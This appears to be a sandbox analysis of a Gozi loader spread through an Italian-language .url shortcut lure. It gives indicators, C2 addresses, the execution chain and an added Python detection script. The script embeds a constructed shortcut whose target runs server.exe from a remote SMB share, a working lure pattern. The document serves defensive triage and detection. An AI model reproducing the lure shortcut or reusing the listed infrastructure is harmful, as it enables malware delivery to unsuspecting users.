Analysis

max time kernel: 144s
max time network: 146s
platform: windows10-2004_x64
resource: win10v2004-20230220-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
submitted: 22/03/2023, 07:23

Static task: static1
Behavioral task: behavioral1
Sample: Documenti/Documenti.url
Resource: win7-20230220-en
General

Target: Documenti/Documenti.url
Size: 194B
MD5: 1b6b88b4f8da87f1524d77166c9a01dd
SHA1: a4abf24eda19bf997e2de103c6d0cb3675f225e0
SHA256: 5ed9e8b1e7ca4c6ecce0929514d0f195d4202809a3e933e06f2af0f7eba53d8b
SHA512: 5de1d7a44aa0cea83bc48feaadb712779f1971878d839ab0cf1c310cc40391ea0c6660a939a90c94a1d1f4f5a465bbd746533c3f34b68f2bde5a8d0ed883d04d
Malware Config

Extracted
Family: gozi
Botnet: 7715
C2:
  checklist.skype.com
  62.173.142.50
  31.41.44.87
  109.248.11.217
  212.109.218.151
  5.44.45.83
  62.173.142.81
  193.233.175.113
  109.248.11.184
  212.109.218.26
  185.68.93.7
base_path: /drew/
build: 250255
exe_type: loader
extension: .jlk
server_id: 50

Note: checklist.skype.com is a Microsoft-looking hostname that shows up as a filler/decoy entry at the head of many Gozi C2 lists; pivot on the IP addresses, base_path and the .jlk extension rather than blocking that name on its own.

Extracted
Family: gozi (second extraction; no further fields reported)
Signatures

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence.
  Process: rundll32.exe
  Key queried: \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The sandbox's generic annotation for this signature ("likely ransomware behaviour") does not fit here: the extracted config identifies a Gozi loader, and loaders enumerate drives for reconnaissance and sandbox evasion as well.

Suspicious use of WriteProcessMemory (3 IoCs)
  description                          pid   Process       procid_target
  PID 1560 wrote to memory of 2560     1560  rundll32.exe  87
  (the same entry is reported three times)
A parent writing into a child it has just created is also what ordinary process creation looks like to an API hook, so this signature is weak evidence by itself; the notable fact is that the child image (PID 2560) is loaded from a UNC share, see Processes below.
Processes

1. C:\Windows\System32\rundll32.exe (PID 1560)
   "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Documenti\Documenti.url
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory
   2. \??\UNC\109.248.11.226\Agenzia\server.exe (PID 2560)
      "\\109.248.11.226\Agenzia\server.exe"

The chain is the standard Internet Shortcut abuse: the 194-byte .url file is an INI-style shortcut whose target is a file on an attacker-controlled SMB share rather than a web page. Opening it makes Windows call rundll32 with ieframe.dll,OpenURL, which resolves the target and executes server.exe directly from \\109.248.11.226\Agenzia\ (the host also sees an outbound SMB connection and an NTLM authentication attempt as part of that fetch). The staging host 109.248.11.226 is not in the extracted C2 list but sits in the same /24 as two of the C2 addresses (109.248.11.217 and 109.248.11.184). The Italian-language lure names (Documenti, Agenzia) are consistent with the Geo\Nation check above.
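Two checks a responder wants for this class of sample, as an added example that is not part of the sandbox report: parse a .url shortcut and classify where its URL= target points (a file:// or raw UNC target that rundll32 ieframe.dll,OpenURL will happily open is the red flag), and flag the process chain the report records, rundll32 OpenURL spawning a child whose image lives on a UNC share. The shortcut text and the process-creation records below are constructed to match the behaviour in the report (the real 194-byte file content is not on the page); the benign browser launch is added so the detection has a negative case.

```python
"""Triage of Internet Shortcut (.url) lures and the rundll32 OpenURL launch chain.

Added example, not part of the sandbox report. SAMPLE_URL_FILE and SAMPLE_EVENTS
are CONSTRUCTED to mirror the report (child \\109.248.11.226\Agenzia\server.exe
spawned by rundll32 ieframe.dll,OpenURL); the real file content is not on the page.
"""
import configparser
import re
from urllib.parse import urlparse

# Constructed shortcut pointing at the same UNC host/share/file the sandbox
# recorded as the child process. Windows maps file://host/share/x to \\host\share\x.
SAMPLE_URL_FILE = """[InternetShortcut]
URL=file://109.248.11.226/Agenzia/server.exe
IconIndex=1
IconFile=C:\\Windows\\System32\\shell32.dll
"""

EXEC_EXTS = {".exe", ".dll", ".scr", ".com", ".bat", ".cmd", ".js", ".vbs", ".hta", ".lnk", ".msi"}


def parse_url_file(text: str) -> dict:
    """Return the [InternetShortcut] section as a dict with lower-cased keys."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text.lstrip("\ufeff"))  # tolerate a UTF-8 BOM
    if "InternetShortcut" not in cp:
        raise ValueError("no [InternetShortcut] section")
    return {k.lower(): v for k, v in cp["InternetShortcut"].items()}


def classify_target(url: str) -> str:
    """'remote-unc' = a file on another host (SMB fetch + NTLM auth on open)."""
    if url.startswith("\\\\"):            # a raw UNC path is accepted by OpenURL too
        return "remote-unc"
    p = urlparse(url)
    scheme = p.scheme.lower()
    if scheme == "file":
        return "remote-unc" if p.netloc else "local-file"
    if scheme in ("http", "https"):
        return "web"
    return "other"


def triage_url_file(text: str) -> dict:
    """Verdict for one shortcut: remote file targets and local executables are suspicious."""
    fields = parse_url_file(text)
    url = fields.get("url", "")
    target = classify_target(url)
    name = re.split(r"[\\/]", url)[-1]
    ext = "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""
    executable = ext in EXEC_EXTS
    suspicious = target == "remote-unc" or (target == "local-file" and executable)
    return {"url": url, "target": target, "executable": executable,
            "verdict": "suspicious" if suspicious else "benign-looking"}


# rundll32 launching ieframe.dll,OpenURL is how Explorer opens a .url file.
OPENURL_RE = re.compile(r'ieframe\.dll"?\s*,\s*OpenURL', re.IGNORECASE)
# Image path on a UNC share, in either the \??\UNC\host\share or \\host\share form.
UNC_IMAGE_RE = re.compile(r"^(?:\\\?\?\\UNC\\|\\\\)[^\\]+\\", re.IGNORECASE)

# Constructed process-creation records: the report's tree plus a benign OpenURL
# launch of a local browser that must not fire.
SAMPLE_EVENTS = [
    {"pid": 1560, "ppid": 1000, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Documenti\Documenti.url'},
    {"pid": 2560, "ppid": 1560, "image": r"\??\UNC\109.248.11.226\Agenzia\server.exe",
     "cmdline": r"\\109.248.11.226\Agenzia\server.exe"},
    {"pid": 3100, "ppid": 1000, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\Desktop\intranet.url'},
    {"pid": 3101, "ppid": 3100, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" https://intranet.example'},
]


def flag_openurl_unc_children(events) -> list:
    """PIDs whose image is on a UNC share and whose parent is rundll32 running OpenURL."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if not parent or not parent["image"].lower().endswith("rundll32.exe"):
            continue
        if OPENURL_RE.search(parent["cmdline"]) and UNC_IMAGE_RE.match(e["image"]):
            hits.append(e["pid"])
    return hits


if __name__ == "__main__":
    print(triage_url_file(SAMPLE_URL_FILE))
    print("flagged child PIDs:", flag_openurl_unc_children(SAMPLE_EVENTS))
```

The file-level check is cheap enough to run on every .url attachment at the mail gateway; the process-chain check maps onto Sysmon or EDR process-creation telemetry (parent command line plus child image path) and catches the payload fetch regardless of which host or share the lure points at.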